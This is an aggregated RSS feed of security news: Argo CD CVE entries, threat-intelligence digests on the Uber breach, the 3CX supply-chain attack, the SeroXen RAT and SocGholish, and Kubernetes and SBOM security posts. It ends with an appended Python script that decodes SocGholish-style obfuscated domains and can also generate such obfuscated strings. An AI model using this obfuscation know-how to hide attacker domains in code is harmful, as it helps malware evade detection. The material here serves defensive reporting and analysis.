www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-06-03T12:47:24+00:00 www.secnews.physaphae.fr ProofPoint - Cyber Firms L'augmentation préoccupante des attaques centrées sur l'identité: tendances et faits<br>The Concerning Rise in Identity-Centric Attacks: Trends and Facts 2024-01-09T11:57:12+00:00 https://www.proofpoint.com/us/blog/identity-threat-defense/rise-in-identity-threats www.secnews.physaphae.fr/article.php?IdArticle=8437188 False Ransomware,Malware,Tool,Threat,Studies Uber 2.0000000000000000 ProofPoint - Cyber Firms 8 sujets essentiels de cybersécurité à inclure dans votre programme de formation<br>8 Essential Cybersecurity Topics to Include in Your Training Program 2023-11-27T09:26:51+00:00 https://www.proofpoint.com/us/blog/security-awareness-training/cybersecurity-topics-to-include-in-your-program www.secnews.physaphae.fr/article.php?IdArticle=8417272 False Ransomware,Malware,Tool,Vulnerability,Threat,Mobile,Cloud Uber,Uber 2.0000000000000000 ProofPoint - Cyber Firms Prévenir les attaques de fatigue du MFA: sauvegarder votre organisation<br>Preventing MFA Fatigue Attacks: Safeguarding Your Organization 2023-11-21T08:35:02+00:00 https://www.proofpoint.com/us/blog/information-protection/preventing-mfa-fatigue-attacks www.secnews.physaphae.fr/article.php?IdArticle=8415409 False Ransomware,Data Breach,Malware,Tool,Threat,Technical Uber 3.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Ensuring robust security of a containerized environment CI/CD pipeline, microservice architecture, and frictionless integration with orchestration tools. Orchestration tools form the backbone of container ecosystems, providing vital functionalities such as load balancing, fault tolerance, centralized management, and seamless system scaling. 
Orchestration can be realized through diverse approaches, including cloud provider services, self-deployed Kubernetes clusters, container management systems tailored for developers, and container management systems prioritizing user-friendliness. The container threat landscape According to recent findings of Sysdig, a company specializing in cloud security, a whopping 87% of container images have high-impact or critical vulnerabilities. While 85% of these flaws have a fix available, they can’t be exploited because the hosting containers aren’t in use. That said, many organizations run into difficulties prioritizing the patches. Rather than harden the protections of the 15% of entities exposed at runtime, security teams waste their time and resources on loopholes that pose no risk. One way or another, addressing these vulnerabilities requires the fortification of the underlying infrastructure. Apart from configuring orchestration systems properly, it’s crucial to establish a well-thought-out set of access permissions for Docker nodes or Kubernetes. Additionally, the security of containers hinges on the integrity of the images used for their construction. Guarding containers throughout the product life cycle A container\'s journey encompasses three principal stages. The initial phase involves constructing the container and subjecting it to comprehensive functional and load tests. Subsequently, the container is stored in the image registry, awaiting its moment of execution. The third stage, container runtime, occurs when the container is launched and operates as intended. Early identification of vulnerabilities is vital, and this is where the shift-left security principle plays a role. It encourages an intensified focus on security from the nascent stages of the product life cycle, encompassing the design and requirements gathering phases. 
By incorporating automated security checks within the CI/CD pipeline, developers can detect security issues early and minimize the chance of security gap]]> 2023-10-26T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/ensuring-robust-security-of-a-containerized-environment www.secnews.physaphae.fr/article.php?IdArticle=8400754 False Tool,Vulnerability,Threat,Cloud Uber 3.0000000000000000 CVE Liste - Common Vulnerability Exposure CVE-2023-40025 Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All versions of Argo CD starting from version 2.6.0 have a bug where open web terminal sessions do not expire. This bug allows users to send any websocket messages even if the token has already expired. The most straightforward scenario is when a user opens the terminal view and leaves it open for an extended period. This allows the user to view sensitive information even when they should have been logged out already. A patch for this vulnerability has been released in the following Argo CD versions: 2.6.14, 2.7.12 and 2.8.1.]]> 2023-08-23T20:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-40025 www.secnews.physaphae.fr/article.php?IdArticle=8373842 False Tool,Vulnerability Uber None AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Pourquoi la sécurité de l'API est-elle la prochaine grande chose en cybersécurité?<br>Why is API security the next big thing in Cybersecurity? The State of API Security Q1 Report 2023 survey finding concluded that the attacks targeting APIs had increased 400% during the past six months. Security vulnerabilities within APIs compromise critical systems, resulting in unauthorized access and data breaches like Twitter and Optus API breaches. Cybercriminals can exploit the vulnerabilities and launch various attacks like authentication attacks, distributed denial-of-service attacks (DDoS), and malware attacks. 
API security has emerged as a significant business issue as another report reveals that by 2023, API abuses will be the most frequent attack vector causing data breaches, and also, 50% of data theft incidents will happen due to insecure APIs. As a result, API security has. become a top priority for organizations to safeguard their data, which may cost businesses $75 billion annually. Why does API security still pose a threat in 2023? Securing APIs has always been a daunting task for most organizations, mainly because of the misconfigurations within APIs and the rise in cloud data breaches. As the security landscape evolved, API sprawl became the top reason that posed a threat to API security. API sprawl is the uncontrolled proliferation of APIs across an organization and is a common problem for enterprises with multiple applications, services, and development teams. As more APIs are created, they expanded the attack surface and emerged as an attractive target for hackers. The issue is that the APIs are not always designed by keeping security standards in mind. This leads to a lack of authorization and authentication, exposing sensitive data like personally identifiable information (PII) or other business data.  
API sprawl]]> 2023-08-15T10:00:00+00:00 https://cybersecurity.att.com/blogs/security-essentials/why-is-api-security-the-next-big-thing-in-cybersecurity www.secnews.physaphae.fr/article.php?IdArticle=8370101 False Malware,Tool,Vulnerability,Threat,Cloud Uber 3.0000000000000000 knowbe4 - cybersecurity services Cyberheistnews Vol 13 # 22 [Eye on Fraud] Un examen plus approfondi de la hausse massive de 72% des attaques de phishing financier<br>CyberheistNews Vol 13 #22 [Eye on Fraud] A Closer Look at the Massive 72% Spike in Financial Phishing Attacks CyberheistNews Vol 13 #22 CyberheistNews Vol 13 #22  |   May 31st, 2023 [Eye on Fraud] A Closer Look at the Massive 72% Spike in Financial Phishing Attacks With attackers knowing financial fraud-based phishing attacks are best suited for the one industry where the money is, this massive spike in attacks should both surprise you and not surprise you at all. When you want tires, where do you go? Right – to the tire store. Shoes? Yup – shoe store. The most money you can scam from a single attack? That\'s right – the financial services industry, at least according to cybersecurity vendor Armorblox\'s 2023 Email Security Threat Report. According to the report, the financial services industry as a target has increased by 72% over 2022 and was the single largest target of financial fraud attacks, representing 49% of all such attacks. When breaking down the specific types of financial fraud, it doesn\'t get any better for the financial industry: 51% of invoice fraud attacks targeted the financial services industry 42% were payroll fraud attacks 63% were payment fraud To make matters worse, nearly one-quarter (22%) of financial fraud attacks successfully bypassed native email security controls, according to Armorblox. That means one in five email-based attacks made it all the way to the Inbox. 
The next layer in your defense should be a user that\'s properly educated using security awareness training to easily identify financial fraud and other phishing-based threats, stopping them before they do actual damage. Blog post with links:https://blog.knowbe4.com/financial-fraud-phishing [Live Demo] Ridiculously Easy Security Awareness Training and Phishing Old-school awareness training does not hack it anymore. Your email filters have an average 7-10% failure rate; you need a strong human firewall as your last line of defense. Join us Wednesday, June 7, @ 2:00 PM (ET), for a live demonstration of how KnowBe4 introduces a new-school approach to security awareness training and simulated phishing. Get a look at THREE NEW FEATURES and see how easy it is to train and phish your users. ]]> 2023-05-31T13:00:00+00:00 https://blog.knowbe4.com/cyberheistnews-vol-13-22-eye-on-fraud-a-closer-look-at-the-massive-72-percent-spike-in-financial-phishing-attacks www.secnews.physaphae.fr/article.php?IdArticle=8340859 False Ransomware,Malware,Hack,Tool,Threat,Conference ChatGPT,ChatGPT,Uber,Guam 2.0000000000000000 AlienVault Lab Blog - AlienVault est un acteur de defense majeur dans les IOC Rat Seroxen à vendre<br>SeroXen RAT for sale github page to provide user support or employee monitoring. It has been historically associated with malicious activity performed by threat actors, APT groups (like in this Mandiant report from 2017), or government attacks (in this report by Unit42 in 2017). It was first released in July 2014 as “xRAT” and renamed to “Quasar” in August 2015. Since then, there have been released updates to the code until v1.4.1 in March 2023, which is the most current version. As an open-source RAT tool with updates 9 years after its creation, it is no surprise that it continues to be a common tool used by itself or combined with other payloads by threat actors up to this day. 
In a review of the most recent samples, a new Quasar variant was observed by Alien Labs in the wild: SeroXen. This new RAT is a modified branch of the open-source version, adding some modifications features to the original RAT. They’re selling it for monthly or lifetime fee. Figure 1 contains some of the features advertised on their website. SeroXen features Figure 1. SeroXen features announced on its website. This new RAT first showed up on a Twitter account, established in September 2022. The person advertising the RAT appeared to be an English-speaking teenager. The same Twitter handle published a review of the RAT on YouTube. The video approached the review from an attacking/Red Team point of view, encouraging people to buy the tool because it is worth the money. They were claiming to be a reseller of the tool. In December 2022, a specific domain was registered to market/sell the tool, seroxen[.]com. The RAT was distributed via a monthly license for $30 USD or a lifetime license of $60 USD. It was around that time that the malware was first observed in the wild, appearing with 0 detections on VirusTotal. After a few months, on the 1st of February, the YouTuber CyberSec Zaado published a video alerting the community about the capabilities of the RAT from a defensive perspective. In late February, the RAT was advertised on social media platforms such as TikTok, Twitter, YouTube, and several cracking forums, including hackforums. There were some conversations on gaming forums complaining about being infected by malware after downloading some video games. The artifacts described by the users matched with SeroXen RAT. The threat actor updated the domain name to seroxen[.]net by the end of March. 
This domain name was registered on March 27th]]> 2023-05-30T22:00:00+00:00 https://cybersecurity.att.com/blogs/labs-research/seroxen-rat-for-sale www.secnews.physaphae.fr/article.php?IdArticle=8340743 False Malware,Tool,Threat APT 10,Uber 2.0000000000000000 Anomali - Firm Blog Anomali Cyber Watch: Deux attaques de la chaîne d'approvisionnement enchaînées, leurre de communication DNS furtive de chien, Evilextractor exfiltrates sur le serveur FTP<br>Anomali Cyber Watch: Two Supply-Chain Attacks Chained Together, Decoy Dog Stealthy DNS Communication, EvilExtractor Exfiltrates to FTP Server Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters (published: April 21, 2023) A new Monero cryptocurrency-mining campaign is the first recorded case of gaining persistence via Kubernetes (K8s) Role-Based Access Control (RBAC), according to Aquasec researchers. The recorded honeypot attack started with exploiting a misconfigured API server. The attackers preceded by gathering information about the cluster, checking if their cluster was already deployed, and deleting some existing deployments. They used RBAC to gain persistence by creating a new ClusterRole and a new ClusterRole binding. The attackers then created a DaemonSet to use a single API request to target all nodes for deployment. The deployed malicious image from the public registry Docker Hub was named to impersonate a legitimate account and a popular legitimate image. It has been pulled 14,399 times and 60 exposed K8s clusters have been found with signs of exploitation by this campaign. Analyst Comment: Your company should have protocols in place to ensure that all cluster management and cloud storage systems are properly configured and patched. 
K8s buckets are too often misconfigured and threat actors realize there is potential for malicious activity. A defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) approach is a good mitigation step to help prevent actors from highly-active threat groups. MITRE ATT&CK: [MITRE ATT&CK] T1190 - Exploit Public-Facing Application | [MITRE ATT&CK] T1496 - Resource Hijacking | [MITRE ATT&CK] T1036 - Masquerading | [MITRE ATT&CK] T1489 - Service Stop Tags: Monero, malware-type:Cryptominer, detection:PUA.Linux.XMRMiner, file-type:ELF, abused:Docker Hub, technique:RBAC Buster, technique:Create ClusterRoleBinding, technique:Deploy DaemonSet, target-system:Linux, target:K8s, target:​​Kubernetes RBAC 3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise; Suspected North Korean Actor Responsible (published: April 20, 2023) Investigation of the previously-reported 3CX supply chain compromise (March 2023) allowed Mandiant researchers to detect it was a result of prior software supply chain attack using a trojanized installer for X_TRADER, a software package provided by Trading Technologies. The attack involved the publicly-available tool SigFlip decrypting RC4 stream-cipher and starting publicly-available DaveShell shellcode for reflective loading. It led to installation of the custom, modular VeiledSignal backdoor. 
VeiledSignal additional modules inject the C2 module in a browser process instance, create a Windows named pipe and]]> 2023-04-25T18:22:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-two-supply-chain-attacks-chained-together-decoy-dog-stealthy-dns-communication-evilextractor-exfiltrates-to-ftp-server www.secnews.physaphae.fr/article.php?IdArticle=8331005 False Ransomware,Spam,Malware,Tool,Threat,Cloud APT 38,ChatGPT,APT 43,Uber 2.0000000000000000 CVE Liste - Common Vulnerability Exposure CVE-2023-23947 2023-02-16T18:15:11+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-23947 www.secnews.physaphae.fr/article.php?IdArticle=8310941 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2023-25163 2023-02-08T21:15:10+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-25163 www.secnews.physaphae.fr/article.php?IdArticle=8308422 False Spam,Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2023-25165 2023-02-08T20:15:24+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-25165 www.secnews.physaphae.fr/article.php?IdArticle=8308394 False Tool Uber None CVE Liste - Common Vulnerability Exposure CVE-2023-22736 2023-01-26T21:18:13+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-22736 www.secnews.physaphae.fr/article.php?IdArticle=8304612 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2023-22482 2023-01-26T21:18:12+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-22482 www.secnews.physaphae.fr/article.php?IdArticle=8304606 False Tool,Vulnerability Uber None Dark Reading - Informationweek Branch Microsoft: Kinsing Targets Kubernetes via Containers, PostgreSQL 2023-01-10T17:00:00+00:00 https://www.darkreading.com/cloud/microsoft-kinsing-malware-kubernetes-containers-postgresql www.secnews.physaphae.fr/article.php?IdArticle=8299606 False Tool Uber 2.0000000000000000 Dark Reading - Informationweek Branch How to Run 
Kubernetes More Securely 2022-12-21T15:51:30+00:00 https://www.darkreading.com/dr-tech/how-to-run-kubernetes-more-securely www.secnews.physaphae.fr/article.php?IdArticle=8296203 False Tool,Threat Uber 2.0000000000000000 CVE Liste - Common Vulnerability Exposure CVE-2022-23526 2022-12-15T19:15:17+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23526 www.secnews.physaphae.fr/article.php?IdArticle=8291702 False Tool Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-23525 2022-12-15T19:15:17+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23525 www.secnews.physaphae.fr/article.php?IdArticle=8291701 False Tool Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-23524 2022-12-15T19:15:16+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-23524 www.secnews.physaphae.fr/article.php?IdArticle=8291700 False Tool Uber None GoogleSec - Firm Security Blog Announcing GUAC, a great pairing with SLSA (and SBOM)! rise in software supply chain attacks, a Log4j vulnerability of catastrophic severity and breadth, and even an Executive Order on Cybersecurity. It is against this background that Google is seeking contributors to a new open source project called GUAC (pronounced like the dip). GUAC, or Graph for Understanding Artifact Composition, is in the early stages yet is poised to change how the industry understands software supply chains. GUAC addresses a need created by the burgeoning efforts across the ecosystem to generate software build, security, and dependency metadata. True to Google's mission to organize and make the world's information universally accessible and useful, GUAC is meant to democratize the availability of this security information by making it freely accessible and useful for every organization, not just those with enterprise-scale security and IT funding. 
Thanks to community collaboration in groups such as OpenSSF, SLSA, SPDX, CycloneDX, and others, organizations increasingly have ready access to: Software Bills of Materials (SBOMs) (with SPDX-SBOM-Generator, Syft, kubernetes bom tool) signed attestations about how software was built (e.g. SLSA with SLSA3 Github Actions Builder, Google Cloud Build) vulnerability databases that aggregate information across ecosystems and make vulnerabilities more discoverable and actionable (e.g. OSV.dev, Global Security Database (GSD)). These data are useful on their own, but it's difficult to combine and synthesize the information for a more comprehensive view. The documents are scattered across different databases and producers, are attached to different ecosystem entities, and cannot be easily aggregated to answer higher-level questions about an organization's software assets. To help address this issue we've teamed up with Kusari, Purdue University, and Citi to create GUAC, a free tool to bring together many different sources of software security metadata. We're excited to share the project's proof of concept, which lets you query a small dataset of software metadata including SLSA provenance, SBOMs, and OpenSSF Scorecards. What is GUAC Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database-normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance. 
Conceptually, GUAC occupies the “aggregation and synthesis” layer of the software supply chain transparency logical model: ]]> 2022-10-20T13:01:02+00:00 http://security.googleblog.com/2022/10/announcing-guac-great-pairing-with-slsa.html www.secnews.physaphae.fr/article.php?IdArticle=7739960 False Tool,Vulnerability Uber None TechRepublic - Security News US Uber exposes Lapsus$ extortion group for security breach In last week's security breach against Uber, the attackers downloaded internal messages from Slack as well as information from a tool used to manage invoices. ]]> 2022-09-20T20:17:02+00:00 https://www.techrepublic.com/article/uber-exposes-lapsus-breach/ www.secnews.physaphae.fr/article.php?IdArticle=7022467 False Tool Uber None Anomali - Firm Blog Anomali Cyber Watch: Uber and GTA 6 Were Breached, RedLine Bundle File Advertises Itself on YouTube, Supply-Chain Attack via eCommerce Fishpig Extensions, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hacker Pwns Uber Via Compromised VPN Account (published: September 16, 2022) On September 15, 2022, ride-sharing giant Uber started an incident response after discovering a data breach. According to Group-IB researchers, download file name artifacts point to the attacker getting access to fresh keylogger logs affecting two Uber employees from Indonesia and Brazil that have been infected with Racoon and Vidar stealers. The attacker allegedly used a compromised VPN account credentials and performed multifactor authentication fatigue attack by requesting the MFA push notification many times and then making a social-engineering call to the affected employee. Once inside, the attacker allegedly found valid credentials for privilege escalation: a PowerShell script containing hardcoded credentials for a Thycotic privileged access management admin account. 
On September 18, 2022, Rockstar Games’ Grand Theft Auto 6 suffered a confirmed data leak, likely caused by the same attacker. Analyst Comment: Network defenders can consider setting up alerts for signs of an MFA fatigue attack such as a large number of MFA requests in a relatively short period of time. Review your source code for embedded credentials, especially those with administrative privileges. MITRE ATT&CK: [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Credentials from Password Stores - T1555 Tags: MFA fatigue, Social engineering, Data breach, Uber, GTA 6, GTA VI, detection:Racoon, detection:Vidar, malware-type:Keylogger, malware-type:Stealer Self-Spreading Stealer Attacks Gamers via YouTube (published: September 15, 2022) Kaspersky researchers discovered a new campaign spreading the RedLine commodity stealer. This campaign utilizes a malicious bundle: a single self-extracting archive. The bundle delivers RedLine and additional malware, which enables spreading the malicious archive by publishing promotional videos on victim’s Youtube channel. These videos target gamers with promises of “cheats” and “cracks.” Analyst Comment: Kids and other online gamers should be reminded to avoid illegal software. It might be better to use different machines for your gaming and banking activities. 
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Resource Hijacking - T1496 Tags: detection:RedLine, malware-type:Stealer, Bundle, Self-spreading, Telegraph, Youtub]]> 2022-09-20T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-uber-and-gta-6-were-breached-redline-bundle-file-advertises-itself-on-youtube-supply-chain-attack-via-ecommerce-fishpig-extensions-and-more www.secnews.physaphae.fr/article.php?IdArticle=7016803 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline Uber,Uber,APT 15,APT 41 None CVE Liste - Common Vulnerability Exposure CVE-2022-36049 2022-09-07T21:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36049 www.secnews.physaphae.fr/article.php?IdArticle=6774470 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-36055 2022-09-01T13:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36055 www.secnews.physaphae.fr/article.php?IdArticle=6666260 False Tool Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-36035 2022-08-31T15:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-36035 www.secnews.physaphae.fr/article.php?IdArticle=6648917 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-31105 2022-07-12T22:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31105 www.secnews.physaphae.fr/article.php?IdArticle=5679746 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-31102 2022-07-12T22:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31102 www.secnews.physaphae.fr/article.php?IdArticle=5679745 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-31036 =v2.3.0 and do not have any Helm-type Applications you may disable the Helm config management tool as a workaround.]]> 2022-06-27T20:15:08+00:00 
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31036 www.secnews.physaphae.fr/article.php?IdArticle=5423402 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-31034 2022-06-27T19:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31034 www.secnews.physaphae.fr/article.php?IdArticle=5422523 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-31035 2022-06-27T19:15:08+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31035 www.secnews.physaphae.fr/article.php?IdArticle=5422524 False Tool,Vulnerability Uber None GoogleSec - Firm Security Blog SBOM in Action: finding vulnerabilities with a Software Bill of Materials SBOMs)-a list of all the components, libraries, and modules that are required to build a piece of software. In the wake of the 2021 Executive Order on Cybersecurity, these ingredient labels for software became popular as a way to understand what's in the software we all consume. The guiding idea is that it's impossible to judge the risks of particular software without knowing all of its components-including those produced by others. This increased interest in SBOMs saw another boost after the National Institute of Standards and Technology (NIST) released its Secure Software Development Framework, which requires SBOM information to be available for software. But now that the industry is making progress on methods to generate and share SBOMs, what do we do with them?Generating an SBOM is only one half of the story. Once an SBOM is available for a given piece of software, it needs to be mapped onto a list of known vulnerabilities to know which components could pose a threat. 
By connecting these two sources of information, consumers will know not just what's in what's in their software, but also its risks and whether they need to remediate any issues.In this blog post, we demonstrate the process of taking an SBOM from a large and critical project-Kubernetes-and using an open source tool to identify the vulnerabilities it contains. Our example's success shows that we don't need to wait for SBOM generation to reach full maturity before we begin mapping SBOMs to common vulnerability databases. With just a few updates from SBOM creators to address current limitations in connecting the two sources of data, this process is poised to become easily within reach of the average software consumer. OSV: Connecting SBOMs to vulnerabilitiesThe following example uses Kubernetes, a major project that makes its SBOM available using the Software Package Data Exchange (SPDX) format-an international open standard (ISO) for communicating SBOM information. The same idea should apply to any project that makes its SBOM available, and for projects that don't, you can generate your own SBOM using the same bom tool Kubernetes created.We have chosen to map the SBOM to the Open Source Vulnerabilities (OSV) database, which describes vulnerabilities in a format that was specifically designed to map to open source package versions or commit hashes. The OSV database excels here as it provides a standardized format and aggregates information across multiple ecosystems (e.g., Python, Golang, Rust) and databases (e.g., Github Advisory Database (GHSA), Global Security Database (GSD)).To connect the SBOM to the database, we'll use the SPDX spdx-to-osv tool. 
This open source tool takes in an SPDX SBOM document, queries the OSV database of vulnerabilities, and returns an enumeration of vulnerabilities present in the software's declared components.Example: Kubernetes' SBOMThe first step is to download Kubernetes' SBOM, which is publicly available and contains information on the project, dependencies, versions, and ]]> 2022-06-14T12:00:00+00:00 http://security.googleblog.com/2022/06/sbom-in-action-finding-vulnerabilities.html www.secnews.physaphae.fr/article.php?IdArticle=5145917 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-29165 2022-05-20T15:15:10+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29165 www.secnews.physaphae.fr/article.php?IdArticle=4717170 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-24904 2022-05-20T14:15:09+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24904 www.secnews.physaphae.fr/article.php?IdArticle=4717093 False Tool,Vulnerability Uber None CVE Liste - Common Vulnerability Exposure CVE-2022-24905 2022-05-20T14:15:09+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24905 www.secnews.physaphae.fr/article.php?IdArticle=4717094 False Tool,Vulnerability Uber None GoogleSec - Firm Security Blog Privileged pod escalations in Kubernetes and GKE GKE Sandbox to strengthen the container security boundary. Over the last few months, GKE Sandbox has protected containers running it against several newly discovered Linux kernel breakout CVEs.Adopt GKE Autopilot for new clusters. Autopilot clusters have default policies that prevent host access through mechanisms like host path volumes and host network. 
The container runtime default seccomp profile is also enabled by default on Autopilot which has prevented several breakouts.Subscribe to GKE Release Channels and use autoupgrade to keep nodes patched automatically against kernel vulnerabilities.Run Google's Container Optimized OS, the minimal and hardened container optimized OS that makes much of the disk read-only.Incorporate binary authorization into your SDLC to require that containers admitted into the cluster are from trusted build systems and up-to-date on patching.Use Secure Command Center's Container Threat Detection or supported third-party tools to detect the most common runtime attacks.More information can be found in the GKE Hardening Guide.How GKE is reducing the use of privileged pod]]> 2022-05-18T09:03:33+00:00 http://security.googleblog.com/2022/05/privileged-pod-escalations-in.html www.secnews.physaphae.fr/article.php?IdArticle=4687661 False Tool,Threat Uber None Anomali - Firm Blog Anomali Cyber Watch: Gamaredon Delivers Four Pterodos At Once, Known-Plaintext Attack on Yanlouwang Encryption, North-Korea Targets Blockchain Industry, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SocGholish and Zloader – From Fake Updates and Installers to Owning Your Systems (published: April 25, 2022) Cybereason researchers have compared trending attacks involving SocGholish and Zloader malware. Both infection chains begin with social engineering and malicious downloads masquerading as legitimate software, and both lead to data theft and possible ransomware installation. SocGholish attacks rely on drive-by downloads followed by user execution of purported browser installer or browser update. The SocGholish JavaScript payload is obfuscated using random variable names and string manipulation. 
The attacker domain names are written in reverse order with the individual string characters being put at the odd index positions. Zloader infection starts by masquerading as a popular application such as TeamViewer. Zloader acts as an information stealer, backdoor, and downloader. Active since 2016, Zloader actively evolves and has acquired detection evasion capabilities, such as excluding its processes from Windows Defender and using living-off-the-land (LotL) executables. Analyst Comment: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Signed Binary Proxy Execution - T1218 | [MITRE ATT&CK] Credentials from Password Stores - T1555 | [MITRE ATT&CK] Steal or Forge Kerberos Tickets - T1558 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Unsecured Credentials - T1552 | [MITRE ATT&CK] Remote System Discovery - T1018 | [MITRE ATT&CK] System Owner/User Discovery - T1033 | 2022-04-26T16:24:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-gamaredon-delivers-four-pterodos-at-once-known-plaintext-attack-on-yanlouwang-encryption-north-korea-targets-blockchain-industry-and-more www.secnews.physaphae.fr/article.php?IdArticle=4508976 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Medical APT 38,Uber,APT 28 None CVE Liste - Common Vulnerability Exposure CVE-2022-24768 2022-03-23T22:15:13+00:00
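The SocGholish string trick described above (domain reversed, real characters at the odd index positions, filler in between) is simple enough to undo mechanically. The decoder and the literal scanner below are an added example, not code from Cybereason's report; they read "odd index" as 0-based (positions 1, 3, 5, ...), an assumption, with a `keep_offset` parameter for the 1-based reading. The JavaScript snippet and the domains in it are constructed.

```python
"""Undo the domain-string obfuscation described above.

Added example, not code from Cybereason's report. The report says the payload
stores attacker domains reversed, with the real characters at the odd index
positions; this example reads that as 0-based indexing (positions 1, 3, 5, ...),
an assumption, with keep_offset=0 covering the 1-based variant. A scanner then
runs the decoder over every string literal of a JavaScript snippet and keeps the
ones that decode to a hostname. The snippet and domains are constructed.
"""
import re
from typing import List

HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$")
# A JS string literal: opening quote, body (escaped char or anything but the
# quote), matching closing quote. findall() yields (quote, body) pairs.
STRING_LITERAL_RE = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
FILLER = "qwertyuiopasdfghjklzxcvbnm0123456789"


def obfuscate_domain(domain: str) -> str:
    """Build a sample in the described layout: reversed domain, real characters at odd indices."""
    out = []
    for i, ch in enumerate(reversed(domain)):
        out.append(FILLER[i % len(FILLER)])  # filler at the even index
        out.append(ch)                       # real character at the odd index
    return "".join(out)


def deobfuscate_domain(blob: str, keep_offset: int = 1) -> str:
    """Keep every second character starting at keep_offset, then reverse the order."""
    return blob[keep_offset::2][::-1]


def extract_domains(js: str, keep_offset: int = 1) -> List[str]:
    """Decode each string literal in a script and return those that become hostnames."""
    found: List[str] = []
    for _quote, body in STRING_LITERAL_RE.findall(js):
        candidate = deobfuscate_domain(body, keep_offset).lower()
        if HOSTNAME_RE.match(candidate) and candidate not in found:
            found.append(candidate)
    return found


# Constructed snippet in the style the report describes: two obfuscated domains,
# one ordinary string, and the decoding routine a loader would carry itself.
SAMPLE_JS = (
    'var a = "' + obfuscate_domain("update-check.example.net") + '";\n'
    'var b = "hello world";\n'
    "var c = '" + obfuscate_domain("cdn.example.org") + "';\n"
    'var d = a.split("").filter(function(_, i) { return i % 2; }).reverse().join("");\n'
)

if __name__ == "__main__":
    print(extract_domains(SAMPLE_JS))
```

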